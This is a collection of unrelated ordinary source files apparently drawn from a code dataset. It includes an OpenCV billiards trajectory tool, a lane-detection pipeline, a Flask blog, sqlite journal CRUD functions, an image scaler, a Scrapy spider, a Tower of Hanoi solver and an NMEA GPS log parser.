                    cv.circle(shown_image, end_point, cue_ball_radius, (0, 255,255), thickness=2)
                    ball_hit = True
                    trj_angle = invert_angle(points_to_angle(ball, end_point))
                    cv.line(shown_image, end_point, point_by_angle(end_point, trj_angle, img.shape[1]*2), (255, 100, 255), thickness=3)
                    # Deflect the cue ball 90 degrees off the hit ball's line.
                    if cue_angle > points_to_angle(start_point, ball):
                        trj_angle += math.pi / 2
                    else:
                        trj_angle -= math.pi / 2
                    hit_balls.append(ball)
                    break
            if ball_hit:
                cv.line(shown_image, start_point, end_point, (100, 100, 255), thickness=3)
                start_point = end_point
                continue
            # Added check so trajectory stops at pocket
            in_pocket = False
            for pocket in pockets:
                if line_circle_collision(start_point, end_point, pocket, 40):  # approximate pocket size in this example
                    points = line_circle_intersection(start_point, end_point, pocket, 40)
                    if len(points) <= 0:
                        continue
                    in_pocket = True
                    end_point = points[0]
                    break
            if in_pocket:
                cv.line(shown_image, start_point, end_point, (100, 100, 255), thickness=3)
                break
            # Pick the two table rails the trajectory could reach, based on
            # the sign and magnitude of the angle.
            sides = [0, 0]
            if trj_angle < 0:
                sides[0] = 0
            else:
                sides[0] = 2
            if abs(trj_angle) < (math.pi / 2):
                sides[1] = 1
            else:
                sides[1] = 3
            found = False
            for i in sides:
                boundary = np.array([table[i], table[0 if i + 1 > 3 else i + 1]], dtype=float)
                point = line_intersect(line.astype(np.float), boundary)
                if point is None:
                    continue
                if 0 <= point[0] <= img.shape[1] and 0 <= point[1] <= img.shape[0]:
                    cv.circle(shown_image, point, 10, (0, 0, 255), thickness=3)
                    cv.line(shown_image, start_point, point, (100, 100, 255), thickness=3)
                    start_point = point
                    # Reflect the angle off a vertical (1, 3) or horizontal rail.
                    if i == 1 or i == 3:
                        if trj_angle > 0:
                            trj_angle = math.pi - trj_angle
                        else:
                            trj_angle = -(trj_angle + math.pi)
                    else:
                        trj_angle = -trj_angle
                    if trj_angle > math.pi:
                        trj_angle = math.pi - trj_angle
                    elif trj_angle < -math.pi:
                        trj_angle = math.pi + trj_angle
                    hit_x = int(start_point[0] + 2000 * np.cos(trj_angle))
                    hit_y = int(start_point[1] + 2000 * np.sin(trj_angle))
                    end_point = (hit_x, hit_y)
                    found = True
                    break
            if not found:
                break
    # DEBUG OPTIONS:
    # - Draw circles where the points are on the cue
    cv.line(shown_image, cue_tip, cue_start, (255, 255, 0), thickness=6)
    cv.circle(shown_image, cue_tip, 6, (0, 0, 0), thickness=-1)
    cv.circle(shown_image, cue_start, 6, (0, 0, 0), thickness=-1)
    cv.circle(shown_image, cue_ball, 6, (0, 255, 0), thickness=-1)
    for pocket in pockets:
        cv.circle(shown_image, pocket, 40, (0, 255, 0), thickness=2)
    # - Let the cue be determined by mouse positions.
    # - Clicking outputs the coordinates of the mouse.
    def mouse_event(event, x, y, flags, param):
        # Left click moves the cue start, right click moves the tip; either
        # triggers a full redraw.
        global cue_start, cue_tip
        if event == cv.EVENT_LBUTTONDOWN:
            cue_start = (x, y)
        if event == cv.EVENT_RBUTTONDOWN:
            cue_tip = (x, y)
        update()
    cv.namedWindow("img", cv.WINDOW_NORMAL)
    cv.setMouseCallback("img", mouse_event)
    cv.imshow("img", shown_image)
    if(cv.waitKey(0) == 27):
        exit(200)
update()  # initial render; subsequent redraws are driven by the mouse callback
|
24,157 | c7c3dc42a0f3614f155aeff1417bb505f9d8efc4 | from .base import *
class LaneFinderPipeline:
    """Stateful lane-detection pipeline.

    Caches the region-of-interest mask (identical for every frame) and the
    previously detected lines so consecutive video frames are smoothed.
    Relies on helpers imported from .base (load_image, get_mask, canny,
    hough_lines, lane_enhance, weighted_img, ...).
    """
    def __init__(self):
        # maybe we will need some params here
        self.image = None
        self.interesting_mask = None  # interest zone mask is the same for each frame
        self.previous_lines = None  # we use the previous lines to average the new ones
    def new(self):
        """ We call new, when we want to apply the pipeline to something unrelated """
        self.interesting_mask = None
        self.previous_lines = None
    def load_image(self, src):
        """Load a frame from a file path, or accept an already-decoded array."""
        if isinstance(src, str):
            # print("Loading image from file %s" % src)
            self.image = load_image(src)
        else:
            self.image = src
    def apply_region_of_interest(self, src=None):
        """Mask out everything outside the (lazily built, cached) interest zone."""
        img = src if src is not None else self.image
        if self.interesting_mask is None:
            self.interesting_mask = get_mask(img)
        return cv2.bitwise_and(img, self.interesting_mask)
    def process_pipeline(self,
                         show_intermediate=False, show_mask=False,
                         show_original=True, show_final=True):
        """Run gray -> blur -> Canny -> ROI -> Hough -> lane averaging and
        return the annotated frame; the show_* flags control plotting."""
        image = self.image
        if image is None:
            raise Exception("Please load an image before starting the process")
        if show_original:
            plt.figure()
            plt.title("Original")
            plt.imshow(image)
        gray = image_to_int(grayscale(image))
        canned = self.apply_region_of_interest(canny(gaussian_blur(gray)))
        # Hough:
        lines = hough_lines(canned)  # get all the lines from canny
        # normal_hug = hough(canned, lines, color=(0, 255, 0))
        if self.previous_lines:  # we add the previous known lanes in the mix
            lines = list(lines) + self.previous_lines
        lines = lane_enhance(lines)  # consider the meaningful lines and average/extend them
        hug = hough(canned, lines=lines)
        self.previous_lines = lines
        # let's build a nice output using some intermediate result
        combo = self.image
        if show_mask:
            mask = get_mask(image, mask_color=(0, 200, 0))
            combo = weighted_img(combo, mask, .2, 1.)
        # combo = weighted_img(combo, normal_hug)
        combo = weighted_img(hug, combo)
        if show_final:
            plt.figure()
            plt.title('Combined')
            plt.imshow(combo)
        return combo
# pipeline = LaneFinderPipeline()
# pipeline.load_image('lane_test_images/solidWhiteRight.jpg')
# result = pipeline.process_pipeline(show_original=False, show_intermediate=False, show_mask=True)
|
24,158 | a81170b005ab683b333400c0556b5651101fc3de | text = input()
if text == "" or text == "/n":
print("ДА")
else:
print("НЕТ") |
24,159 | a18ef3d38eebaef85b8fb7065c1f574c08345b48 | from flask import Flask, render_template, request, redirect, url_for
import json
app = Flask(__name__)
debug = False
blogJsonFilename = 'blog.json' if debug else '/var/www/akilduff/blog.json'
@app.route('/')
def index():
    """Home page: identical to the first (newest) page of the blog."""
    return page(1)
@app.route('/page/<num>')
def page(num):
    """Render page `num` (1-based) of the blog, ten posts per page.

    Posts are stored oldest-first by id; page 1 shows the newest posts,
    each page listed newest-first. Out-of-range pages return 404.
    """
    blog = []
    with open(blogJsonFilename) as jsonFile:
        jsonStr = jsonFile.read()
        blog = sorted(json.loads(jsonStr), key=lambda post: post['id'])
    # Ceiling division. BUG FIX: the original used true division, which
    # yields a float page count under Python 3.
    pageCount = (len(blog) + 9) // 10
    num = int(num)
    if num < 1 or num > pageCount:
        return notfound(None)
    # Pages count back from the end of the id-sorted list.
    startIndex = 0 if (len(blog) < (num * 10)) else (len(blog) - (num * 10))
    endIndex = len(blog) - ((num - 1) * 10)
    posts = blog[startIndex:endIndex][::-1]
    showPrev = num > 1
    showNext = len(blog) > (num * 10)
    return render_template('blog.html', posts=posts, showPrev=showPrev, showNext=showNext, num=num)
@app.route('/post/<num>')
def post(num):
    """Render the single post whose id matches `num`, or 404 if absent."""
    blog = []
    with open(blogJsonFilename) as jsonFile:
        jsonStr = jsonFile.read()
        blog = json.loads(jsonStr)
    for post in blog:
        # Route parameters arrive as strings, so compare string-to-string.
        if str(post['id']) == num:
            return render_template('post.html', post = post)
    return notfound(None)
@app.route('/about')
def about():
    """Static about page."""
    return render_template('about.html')
@app.route('/donate')
def donate():
    """Static donation page."""
    return render_template('donate.html')
@app.errorhandler(404)
def notfound(error):
    """404 handler; also called directly by views for out-of-range content."""
    return render_template('404.html'), 404
if debug:
app.run()
|
24,160 | a74cad83553b59d8824f9968754e66f8ce4f6271 | # Ao testar sua solução, não se limite ao caso de exemplo.
hE = float(input())
hP = float(input())
print(hE, "extras e ", hP, " de falta")
h = hE - 0.25 * hP
if(h <= 400):
print("R$ 100.0")
else:
print("R$ 500.0") |
24,161 | a663a3151ee59f1ba1366fb430b65667af718354 | """
api.py
"""
from tastypie.authorization import Authorization, DjangoAuthorization
from tastypie.resources import ALL
from tastypie.fields import DictField
from mongoengine.django.auth import User
from tastypie_mongoengine import resources
from bson.objectid import ObjectId
from hopscotch.mongo_tastypie.auth import MongoAuthentication, MongoAuthorization
from hopscotch.dram.documents import Drink, Checkin
class PublicResource(resources.MongoEngineResource):
    """
    A resource for the public feed: all checkins, read-only.
    """
    class Meta:
        queryset = Checkin.objects.all()
        allowed_methods = ('get',)  # public feed is never writable
class DrinkResource(resources.MongoEngineResource):
    """
    A resource for drinks: full CRUD, filterable by name and id.
    """
    class Meta:
        queryset = Drink.objects.all()
        allowed_methods = ('get', 'post', 'put', 'delete')
        # NOTE(review): blanket Authorization() allows every caller —
        # confirm MongoAuthorization was not intended here.
        authorization = Authorization()
        filtering = {
            'name': ALL,
            'id': ALL,
        }
class CheckinResource(resources.MongoEngineResource):
    """
    A resource for checkins, with the referenced drink embedded as a dict.
    """
    drink = DictField()

    class Meta:
        queryset = Checkin.objects.all()
        allowed_methods = ('get', 'post', 'put', 'delete')
        resource_name = 'checkin'
        authorization = Authorization()
        filtering = {
            'name': ALL,
            'id': ALL,
            'drink_id': ALL,
            'user_id': ALL,
        }

    def dehydrate_drink(self, bundle):
        """Embed the checkin's drink document, or None when it has no drink_id.

        BUG FIX: removed a leftover Python-2-style debug `print` statement
        (a syntax error under Python 3).
        """
        try:
            drink = Drink.objects.get(id=bundle.obj.drink_id)
            dehydrate_dict = drink._data.copy()
            # mongoengine keeps the document id under the None key; drop it
            # and expose a plain 'id' field instead.
            dehydrate_dict.pop(None)
            dehydrate_dict['id'] = drink.id
            return dehydrate_dict
        except AttributeError:
            return None
# class UserResource(resources.MongoEngineResource):
# """
# A user resource
# """
# class Meta:
# queryset = User.objects.all()
# allowed_methods = ('get', 'post', 'put', 'delete')
# authorization = Authorization()
|
24,162 | 087a2ceba2542308335379769432cd401ccaefea | import sqlite3
import json
from models.entry import Entry
from models.mood import Mood
def get_all_entries():
    """Return all journal entries as a JSON string, each with its mood embedded."""
    with sqlite3.connect("./dailyjournal.db") as conn:
        conn.row_factory = sqlite3.Row
        db_cursor = conn.cursor()
        db_cursor.execute("""
        SELECT
            a.id,
            a.concept,
            a.entry,
            a.date,
            a.moodId,
            m.label mood_label
        FROM entries a
        JOIN moods m
            ON m.id = a.moodId
        """)
        entries = []
        dataset = db_cursor.fetchall()
        for row in dataset:
            entry = Entry(row['id'], row['concept'], row['entry'], row['date'], row['moodId'])
            mood = Mood(row['moodId'], row['mood_label'])
            # Attach the mood as a plain dict so it serializes with the entry.
            entry.mood = mood.__dict__
            entries.append(entry.__dict__)
        return json.dumps(entries)
def get_single_entry(id):
    """Return the entry with the given primary key as a JSON string."""
    with sqlite3.connect("./dailyjournal.db") as conn:
        conn.row_factory = sqlite3.Row
        db_cursor = conn.cursor()
        # Use a ? parameter to inject a variable's value
        # into the SQL statement.
        db_cursor.execute("""
        SELECT
            a.id,
            a.concept,
            a.entry,
            a.date,
            a.moodId
        FROM entries a
        WHERE a.id = ?
        """, ( id, ))
        data = db_cursor.fetchone()
        # NOTE(review): fetchone() returns None for an unknown id, which
        # would raise TypeError here — confirm callers guarantee existence.
        entry = Entry(data['id'], data['concept'], data['entry'], data['date'], data['moodId'])
        return json.dumps(entry.__dict__)
def search_for_entry(search_term):
    """Return entries whose text contains search_term, as a JSON string."""
    with sqlite3.connect("./dailyjournal.db") as conn:
        conn.row_factory = sqlite3.Row
        db_cursor = conn.cursor()
        # LIKE with surrounding wildcards gives a case-insensitive
        # substring match on the entry body.
        db_cursor.execute("""
        SELECT
            a.id,
            a.concept,
            a.entry,
            a.date,
            a.moodId
        FROM entries a
        WHERE a.entry LIKE ?
        """, ( '%'+search_term+'%', ))
        entries = []
        dataset = db_cursor.fetchall()
        for row in dataset:
            entry = Entry(row['id'], row['concept'], row['entry'], row['date'], row['moodId'])
            entries.append(entry.__dict__)
        return json.dumps(entries)
def delete_entry(id):
    """Remove the journal entry whose primary key matches `id`."""
    with sqlite3.connect("./dailyjournal.db") as conn:
        cursor = conn.cursor()
        cursor.execute("""
        DELETE FROM entries
        WHERE id = ?
        """, (id, ))
def new_journal_entry(new_entry):
    """Insert a new entry (dict with concept/entry/date/moodId) and return
    it as JSON with the generated primary key added."""
    with sqlite3.connect("./dailyjournal.db") as conn:
        db_cursor = conn.cursor()
        db_cursor.execute("""
        INSERT INTO entries
            ( concept, entry, date, moodId )
        VALUES
            ( ?, ?, ?, ?);
        """, (new_entry['concept'],new_entry['entry'],
            new_entry['date'],new_entry['moodId'], ))
        # The `lastrowid` property on the cursor will return
        # the primary key of the last thing that got added to
        # the database.
        id = db_cursor.lastrowid
        # Add the `id` property to the entry dictionary that
        # was sent by the client so that the client sees the
        # primary key in the response.
        new_entry['id'] = id
        return json.dumps(new_entry)
def update_entry(id, new_entry):
    """Overwrite the stored entry with primary key `id` using new_entry.

    Returns True when a row was modified, False when no row matched.
    """
    with sqlite3.connect("./dailyjournal.db") as conn:
        cursor = conn.cursor()
        cursor.execute("""
        UPDATE entries
            SET
                concept = ?,
                entry = ?,
                date = ?,
                moodId = ?
        WHERE id = ?
        """, (new_entry['concept'], new_entry['entry'],
              new_entry['date'], new_entry['moodId'], id, ))
        return cursor.rowcount != 0
|
24,163 | 0e496e401716ad14819fcb664df06c4c831ff72d | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import numpy as np
from PIL import Image
def scale(input_img, size):
    """
    Scale a grayscale image to the specified size using bilinear interpolation.
    Algorithm implemented according to https://en.wikipedia.org/wiki/Bilinear_interpolation

    input_img: 2-D numpy array (height, width) of the image
    size: (width, height) for the output image
    Returns the output image as a numpy uint8 array of shape (height, width).

    PORTABILITY FIX: `xrange` (Python-2-only) replaced with `range`, which
    iterates identically and works on both Python 2 and 3.
    """
    width, height = size
    old_height, old_width = input_img.shape
    x_scale = float(height) / old_height
    y_scale = float(width) / old_width
    output_img = np.zeros((height, width), dtype=np.uint8)
    for xidx in range(height):
        old_x = float(xidx) / x_scale
        for yidx in range(width):
            old_y = float(yidx) / y_scale
            if old_x.is_integer() or old_y.is_integer():
                # NOTE(review): when only ONE coordinate is integral this
                # truncates the other instead of interpolating along that
                # axis — kept as-is to preserve existing output.
                output_img[xidx, yidx] = input_img[int(old_x), int(old_y)]
            else:  # use bilinear interpolation over the 4 surrounding pixels
                x1 = int(np.floor(old_x))
                x2 = int(np.ceil(old_x)) if int(np.ceil(old_x)) < old_height else old_height - 1
                y1 = int(np.floor(old_y))
                y2 = int(np.ceil(old_y)) if int(np.ceil(old_y)) < old_width else old_width - 1
                q11 = input_img[x1, y1]
                q12 = input_img[x1, y2]
                q21 = input_img[x2, y1]
                q22 = input_img[x2, y2]
                # Weighted average of the four neighbours; the 1e-10 guards
                # against division by zero at clamped borders.
                output_img[xidx, yidx] = (q11 * (x2 - old_x) * (y2 - old_y)
                                          + q21 * (old_x - x1) * (y2 - old_y)
                                          + q12 * (x2 - old_x) * (old_y - y1)
                                          + q22 * (old_x - x1) * (old_y - y1)) \
                    / ((x2 - x1) * (y2 - y1) + 1e-10)
    return output_img
def main():
    """Scale images/72.png to a series of target sizes and save each result."""
    input_img = np.array(Image.open('images/72.png').convert('L'))
    sizes = [(192, 128), (96, 64), (48, 32), (24, 16), (12, 8),
             (300, 200), (450, 300), (500, 200)]
    for size in sizes:
        output_img = scale(input_img, size)
        output_img = Image.fromarray(output_img, 'L')
        img_title = "images/scale_%d_%d_72.png" % size
        # output_img.show()
        output_img.save(img_title)
        # print() as a function call parses on both Python 2 and 3
        # (the original py2 print statement is a SyntaxError on py3)
        print("Successfully saved image: %s" % img_title)
if __name__ == '__main__':
main()
|
24,164 | 498d7f7b98155a246cc7595d1a0e407929a95d60 | # Generated by Django 3.1.2 on 2020-11-30 00:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django 3.1.2 migration.

    Adds the Coupon model, drops Product.product_id and adds
    Product.product_imageUrl.
    """

    # must run after the migration that removed product_image
    dependencies = [
        ('djangoecommerceweb', '0002_remove_product_product_image'),
    ]

    operations = [
        migrations.CreateModel(
            name='Coupon',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('coupon_id', models.IntegerField()),
            ],
        ),
        migrations.RemoveField(
            model_name='product',
            name='product_id',
        ),
        migrations.AddField(
            model_name='product',
            name='product_imageUrl',
            # default=999 is only used to backfill existing rows;
            # preserve_default=False drops it from the field afterwards.
            # NOTE(review): 999 is an int on a TextField — a string default
            # was presumably intended; confirm before relying on it.
            field=models.TextField(default=999),
            preserve_default=False,
        ),
    ]
|
24,165 | accbe364d6c5c84011834144bf59fe5cf2a634f0 | # -*- coding: utf-8 -*-
import scrapy
from ..items import HosItem
class DataSpider(scrapy.Spider):
    """Scrape hospital names and locations from the Greek Wikipedia
    "list of hospitals in Greece" page into HosItem items."""
    name = 'data'
    #starting url
    start_urls = ['https://el.wikipedia.org/wiki/%CE%9A%CE%B1%CF%84%CE%AC%CE%BB%CE%BF%CE%B3%CE%BF%CF%82_%CE%BD%CE%BF%CF%83%CE%BF%CE%BA%CE%BF%CE%BC%CE%B5%CE%AF%CF%89%CE%BD_%CF%84%CE%B7%CF%82_%CE%95%CE%BB%CE%BB%CE%AC%CE%B4%CE%B1%CF%82']

    def parse(self, response):
        items = HosItem()
        # NOTE(review): this selects every first-column <td>, then queries
        # 'td:nth-child(1) a' *inside* that cell — the intent was presumably
        # to iterate table rows ('tr'); verify against the page markup.
        table = response.css('td:nth-child(1)')
        #for each row of the table
        for res in table:
            # extract() returns a list of strings, so each field holds a list
            hospital_name = res.css('td:nth-child(1) a::text').extract()
            location = res.css('td+ td a::text').extract()
            items['hospital'] = hospital_name
            items['location'] = location
            # NOTE(review): the same HosItem instance is re-populated and
            # yielded on every iteration — confirm this is intended.
            yield items
|
24,166 | 6bc23c6262dd01430acceb631a214d3edaa05e20 | #!/usr/bin/env python3
import os, re

# Count spam messages per sender domain: list the queued spam files, read the
# first line of each, extract the sender's domain and print a summary table.
domaines = []
os.system("ls /var/spool/sa-exim/SAteergrube/new/ > /home/hassane/domaine")
fichier = open("/home/hassane/domaine", "r")

for ligne in fichier:
    # On supprime le \n qui se trouve à la fin de la ligne
    # (strip the trailing newline from the file name)
    ligne = ligne.rstrip('\n')
    with open("/var/spool/sa-exim/SAteergrube/new/" + ligne, "r") as f:
        # Only the first line of each spam file is inspected (the original
        # `while 1` loop broke after the first readline — and looped forever
        # on an empty file).
        premiere_ligne = f.readline()
    # Regex fix: the original pattern ended in "[(com|fr)]", a character
    # class matching any of the characters c o m | f r ( ) — not the literal
    # TLDs. "(?:com|fr)" matches only .com / .fr addresses, and the capture
    # group now returns the domain directly. Like the original, the last
    # match on the line wins.
    domaine = None
    for adresse in re.findall(r"[a-z0-9._-]+@([a-z0-9._-]+\.(?:com|fr))", premiere_ligne):
        domaine = adresse
    # Only count files in which an address was actually found; the original
    # re-appended the previous file's domain (or raised NameError on the
    # very first file) when no match occurred.
    if domaine is not None:
        domaines.append(domaine)
fichier.close()

# Count occurrences per domain (equivalent to the original destructive
# count-and-filter loop, without the O(n^2) list rebuilding).
nb_spam = {}
for domaine in domaines:
    nb_spam[domaine] = nb_spam.get(domaine, 0) + 1

#print(nb_spam)
print("============================================")
print("==== Domaines ==== Nombre de spams ====")
print("============================================")
for key in nb_spam.keys():
    print("==== ",key," ==== ",nb_spam[key]," ====")
print("============================================")
#print(domaines)
|
24,167 | 5d6c7b169349ec079fc815caaafe3487e1eb8a03 | import setuptools
# Declarative setup script: this package ships no code of its own and exists
# only to require the "wheelbroken" and "upper" packages — presumably a
# packaging test fixture; verify against the surrounding test suite.
setuptools.setup(
    name="requires_wheelbroken_upper",
    version="0",
    install_requires=["wheelbroken", "upper"],
)
|
24,168 | cc223bebb3cb1b13f18e931900046bf7ef52896c | class HanoiMove:
"""
汉诺塔问题
把n块铁饼从杆1挪到杆2上,先把n-1块从1挪到3,然后把最后一块从1挪到2,再把n-1块从3挪到2,于是把原来n块铁饼减小成n-1块,
最后化简成挪1块的问题。
时间复杂度为2^n
"""
def __init__(self, nums=5):
"""
:param nums: 铁饼数量
"""
if not isinstance(nums, int) or nums <= 0:
raise RuntimeError('invalid nums')
self.nums = nums
# 存放每一步步骤,假设铁饼从上到下编号为1.。。。
self.steps = []
# 总共3根杆
self.staff = {1, 2, 3}
# 移动铁饼
self.move(1, 2, nums)
def move(self, mov_from, mov_to, mov_nums, top=1):
"""
把铁饼从一根杆移动到另一杆
:param mov_from: 移动前位置
:param mov_to: 移动后位置
:param mov_nums: 铁饼数量
:param top: 最上边铁饼编号
:return: None
"""
if mov_nums == 1:
# 移动1块铁饼时直接打印步骤
self.steps.append((top, mov_from, mov_to))
return
# 找到中转杆,即第三根杆
at = (self.staff - {mov_from, mov_to}).pop()
# 移动n-1块到中转杆
if mov_nums > 1:
self.move(mov_from, at, mov_nums-1)
# 移动最后一块到目标杆
self.move(mov_from, mov_to, 1, mov_nums)
# 把n-1块从中转杆移到目标杆
if mov_nums > 1:
self.move(at, mov_to, mov_nums-1)
def print_step(self):
"""
打印移动步骤
:return:
"""
print('total %d steps!' % len(self.steps))
for i, step in enumerate(self.steps):
print('%d:moving ring %d from %d to %d' % (i+1, *step))
if __name__ == '__main__':
    # Demo: solve the 8-ring puzzle (2**8 - 1 = 255 moves) and print each step.
    hm = HanoiMove(8)
    hm.print_step()
|
24,169 | b97f5fe1548a7a0282bf267cf7d72d2c3935f4bd | """
ICS 31 Lab 4 Problem 2
Driver: UCI_ID: 31421979 Name: Emily Lee
Navigator: UCI_ID: 18108714 Name: Estela Ramirez Ramirez
"""
def open_file(file_name:str):
    """Open *file_name* and return its first line, or None if the file
    cannot be read (or is empty).

    The original compared the name against the builtin ``file`` (undefined
    on Python 3, so it raised NameError), never closed the handle, and had
    unreachable code after the loop's return. This keeps the observable
    "first line or None" contract while actually using the argument.
    """
    try:
        with open(file_name, "r") as opened_file:
            for line in opened_file:
                return line
            return None  # empty file
    except OSError:
        return None
def search_word(file_name:str, word:str)->int:
    """Count occurrences of *word* among the whitespace-separated tokens of
    *file_name*, comparing tokens lower-cased (so *word* should be given in
    lower case, matching the original behavior).

    Fixes: the file name argument is actually used (the original always
    opened the hard-coded sample file), the debug print of every line was
    removed, and the file is reliably closed (the original's ``file.close()``
    sat after ``return`` and never ran).
    """
    count = 0
    with open(file_name, "r") as file:
        for line in file:
            for token in line.split():
                if token.lower() == word:
                    count += 1
    return count
def main():
    """Prompt for a file name and a target word, then report how many times
    the word occurs in that file."""
    name = input("What is the name of the file, we want to open? ")
    word = input("What word do you want to search for? ")
    # Use the name the user typed — the original asked for it and then
    # passed the hard-coded sample file name instead.
    num = search_word(name, word)
    print("The target word,",word,", occured", num, "times in the file")
if __name__=="__main__":
main()
|
24,170 | a87d7f7c609bbb8e42bf2d476f59520d33d73f08 | import math_func
import pytest
'''
Test that math_func.add returns the sum (or concatenation) of its two arguments.
'''
# Parametrized over ints, strings and floats; note 10.5 + 25.5 == 36.0,
# which compares equal to the int 36.
@pytest.mark.parametrize('num1, num2, result',
                        [
                            (7, 3, 10),
                            ('hello ', 'world', 'hello world'),
                            (10.5, 25.5, 36)
                        ]
                        )
def test_add(num1, num2, result):
    """math_func.add must return the sum/concatenation of its arguments."""
    assert math_func.add(num1, num2) == result
|
24,171 | 8d2c60a37e8e71cce7a5cc4a9df63da65e8e3351 | #
# Copyright 2018 Chris Bang Sørensen, Niels Hvid, Thomas Lemqvist
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
# Packages to install: (pip install)
# pandas, matplotlib, xlrd, numpy
#
from exercise_nmea_data.exportkml import kmlclass
import pandas as pd # for storing data
import numpy as np # for math
from datetime import datetime as time
import datetime
import matplotlib.pyplot as plt # for plotting
import matplotlib.dates as dt
import matplotlib.lines as ln
from math import pi, cos, sqrt, sin, asin
# http://www.trimble.com/oem_receiverhelp/v4.44/en/nmea-0183messages_gga.html
# http://www.gpsinformation.org/dale/nmea.htm#GGA
class nmea_class:
    """Parse NMEA $GPGGA sentences from a log file into a pandas DataFrame
    and provide plotting / KML-export helpers.

    DataFrame columns (GGA field indices): 1 = UTC time, 2 = latitude,
    4 = longitude, 6 = fix quality, 7 = satellites in use, 9 = altitude.
    """

    def __init__(self):
        self.data = []   # raw $GPGGA sentences as lists of fields
        self.df = None   # pandas DataFrame, built by import_file()
        # Timestamp of the previously converted fix; used by convert_dates()
        # to detect a roll-over past midnight.
        self.last_t = time.strptime('1', '%d')
        self.sum_dist = 0

    def import_file(self, file_name):
        """Read *file_name*, keep valid $GPGGA sentences and build self.df."""
        print('Importing file: %s' % file_name)
        file_ok = True
        try:
            # read all lines from the file and strip \n
            lines = [line.rstrip() for line in open(file_name)]
        except OSError:
            # narrowed from a bare `except:` so only I/O problems are
            # treated as "file not readable"
            file_ok = False
        if file_ok is True:
            for i in range(len(lines)):  # for all lines
                if len(lines[i]) > 0 and lines[i][0] != '#':  # if not a comment or empty line
                    csv = lines[i].split(',')  # split into comma separated list
                    # keep only GGA sentences that actually carry a position
                    if str(csv[0]) == '$GPGGA' and len(str(csv[2])) > 0 and len(str(csv[4])) > 0:
                        self.data.append(csv)
            self.df = pd.DataFrame(self.data, columns=list(range(0, 15)))
            self.df[1] = self.df[1].apply(lambda x: self.convert_dates(x))
            self.df[2] = self.df[2].apply(lambda x: self.convert_degrees(2, x))
            self.df[4] = self.df[4].apply(lambda x: self.convert_degrees(3, x))
            self.df[6] = self.df[6].apply(lambda x: self.convert_quality(x))

    def print_data(self):
        """Print the parsed DataFrame.

        The original class defined this method twice with identical bodies;
        the second definition silently shadowed the first, so the duplicate
        has been removed.
        """
        print(self.df)

    def convert_dates(self, value):
        """Parse an hhmmss.ss time field into a datetime, adding one day on
        roll-over past midnight so timestamps stay monotonic."""
        t = time.strptime(str(value), '%H%M%S.%f')
        if t < self.last_t:
            t += datetime.timedelta(days=1)
        self.last_t = t
        return t

    @staticmethod
    def convert_degrees(deg_length, value):
        """Convert an NMEA ddmm.mmmm / dddmm.mmmm string to decimal degrees.
        *deg_length* is the number of leading degree digits (2 lat, 3 lon)."""
        deg = float(value[:deg_length])
        minutes = float(value[deg_length:])
        return float(deg + minutes / 60)

    @staticmethod
    def convert_quality(value):
        """Map the numeric GGA fix-quality field to a readable label."""
        quality = {0: 'invalid', 1: 'GPS fix (SPS)', 2: 'DGPS fix', 3: 'PPS fix', 4: 'RTK', 5: 'RTK float',
                   6: 'estimated', 7: 'Manual input', 8: 'Simulation Mode'}
        val = quality[int(value)]
        return val

    def plot_height_over_time(self):
        """Plot altitude (field 9) against UTC time and save the figure."""
        print('plotting height over time')
        fig, ax = plt.subplots()
        dates = dt.date2num(self.df[1])
        plt.plot(dates, self.df[9])
        plt.xlabel('Time [utc]')
        plt.ylabel('Height [m]')
        ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
        plt.gcf().autofmt_xdate()
        plt.savefig('height_time_plot.png')
        plt.show()

    def plot_number_of_satellites_over_time(self):
        """Plot the satellites-in-use count (field 7) against UTC time."""
        print('plotting satellites over time')
        fig, ax = plt.subplots()
        dates = dt.date2num(self.df[1])
        plt.plot(dates, self.df[7])
        plt.xlabel('Time [utc]')
        plt.ylabel('Satellites [#]')
        ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
        plt.gcf().autofmt_xdate()
        plt.savefig('number_of_satellites_plot.png')
        plt.show()

    def great_circle_distance(self, lat1, lon1, lat2, lon2):
        """Central angle between two points (haversine form).

        NOTE(review): the inputs are decimal degrees but sin/cos expect
        radians, and the result is never scaled by the Earth's radius, so
        the value is not metres — it is only a relative deviation measure
        (callers multiply by 1000 and label it metres). Confirm before
        relying on absolute distances.
        """
        self.sum_dist = 2 * asin(
            sqrt(((sin((lat1 - lat2) / 2)) ** 2) + cos(lat1) * cos(lat2) * ((sin((lon1 - lon2) / 2)) ** 2)))
        return self.sum_dist

    def plot_quality_of_signal_over_time(self):
        """Plot each fix's deviation from the mean position over time."""
        print('plotting quality of signal over time')
        mean_lat = np.mean(self.df[2])
        mean_lon = np.mean(self.df[4])
        self.df['dist'] = self.df.apply(
            lambda row: self.great_circle_distance(mean_lat, mean_lon, row[2], row[4]) * 1000, axis=1)
        print('maximum distance %.3f m' % np.max(self.df['dist']))
        fig, ax = plt.subplots()
        dates = dt.date2num(self.df[1])
        plt.plot(dates, self.df['dist'])
        plt.xlabel('Time [utc]')
        plt.ylabel('Deviation [M]')
        ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
        plt.gcf().autofmt_xdate()
        plt.savefig('quality_of_signal_plot.png')
        plt.show()

    def plot_track(self):
        """Plot the recorded track as longitude vs. latitude."""
        print('plotting track')
        fig, ax = plt.subplots()
        plt.plot(self.df[4], self.df[2])
